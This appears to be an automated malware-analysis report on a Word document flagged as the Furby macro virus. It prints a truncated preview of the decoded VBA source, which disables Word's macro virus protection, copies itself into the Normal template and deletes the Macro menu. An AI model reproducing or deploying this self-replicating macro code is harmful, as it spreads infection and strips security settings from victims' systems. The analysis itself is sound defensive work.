MALICIOUS
240
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including AutoOpen and AutoClose, which are indicative of malicious intent. The ClamAV detection 'Doc.Trojan.Furby-1' strongly suggests a known malware family. The VBA script attempts to modify registry keys related to Microsoft Office applications, potentially for persistence or to alter application behavior, and includes obfuscated logic that is difficult to fully decipher but appears to be part of the Furby malware's known functionality.
Heuristics 5
-
ClamAV: Doc.Trojan.Furby-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Furby-1
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16918 bytes |
SHA-256: d71c2050668ca1b0fdd40b7f0e06458cc3feadcb4170d3373d3d04c0e39fca67 |
|||
|
Detection
ClamAV:
Doc.Trojan.Furby-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error GoTo furby
Randomize: Options.VirusProtection = Chr(48): Options.SaveNormalPrompt = Chr(48): Options.ConfirmConversions = Chr(48): zz = 5: vx = 1: xv = 4: x = 0: z = 0: y = 0
rtx = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
stx = NormalTemplate.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).codemodule.countoflines
If stx > Sgn(x) And rtx > Sgn(x) Then GoTo furby
If stx = Sgn(x) Then
Set xyz = NormalTemplate.VBProject.VBComponents
Set xhst = ActiveDocument.VBProject.VBComponents
If Month(Now()) = 1 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Document.8", "") = "It's Furby!"
If Month(Now()) = 2 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Addin.8", "") = "Microsoft Furby Addin"
If Month(Now()) = 3 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Document.8", "") = "Word Furby Document"
If Month(Now()) = 4 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Application.8", "") = "Microsoft Furby Application"
If Month(Now()) = 5 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Template.8", "") = "Microsoft Furby Template"
If Month(Now()) = 6 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PowerPoint.Template.8", "") = "PowerPoint Furby Template"
If Month(Now()) = 7 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.RTF.8", "") = "Rich Furby Format"
If Month(Now()) = 8 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Wizard.8", "") = "Microsoft Furby Wizard"
If Month(Now()) = 9 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\Word.Picture.8", "") = "Microsoft Furby Picture"
If Month(Now()) = 10 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PowerPoint.Show.8", "") = "Microsoft Furby Presentation"
If Month(Now()) = 11 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\ExcelWorksheet", "") = "Microsoft Furby Worksheet"
If Month(Now()) = 12 And Day(Now()) = 13 Then System.PrivateProfileString("", "HKEY_CLASSES_ROOT\PowerPoint.Slide.8", "") = "Microsoft Furby Slide"
xhst.Item(Cos(Atn(CInt(1)))).Name = xyz.Item(Cos(Atn(CInt(1)))).Name
xhst.Item(Cos(Atn(CInt(1)))).Export Windows.Application.Path & Abs(vx) & Chr(46) + Chr(100) + Chr(108) + Chr(108)
End If
If rtx = Sgn(x) Then Set xyz = ActiveDocument.VBProject.VBComponents
xyz.Item(Cos(Atn(CInt(1)))).codemodule.AddFromFile Windows.Application.Path & Abs(vx) & Chr(46) + Chr(100) + Chr(108) + Chr(108)
With xyz.Item(Cos(Atn(CInt(1)))).codemodule
For j = Abs(vx) To Abs(xv)
.deletelines Abs(vx)
Next j
End With
With xyz.Item(Cos(Atn(CInt(1)))).codemodule
For j = Abs(zz) To xyz.Item(Cos(Atn(CInt(1)))).codemodule.countoflines Step Abs(zz)
y = Int(Rnd(412835) * 303989) + 8485
z = Int(Rnd(487958) * 785865) + 2988
.replaceline j, Chr(39) & y * z & Application.Assistant & z * y & y * z & Application.DisplayRecentFiles & Application.StartupPath
Next j
End With
System.PrivateProfileString("", "HKEY_USERS\.Default\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options", "EnableMacroVirusProtection") = "0"
If stx = Sgn(x) Then CommandBars(Chr(116) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111)).Delete
If stx = Sgn(x) Then CommandBars(Chr(116) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(79) + Chr(112) + Chr(116) + Chr
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.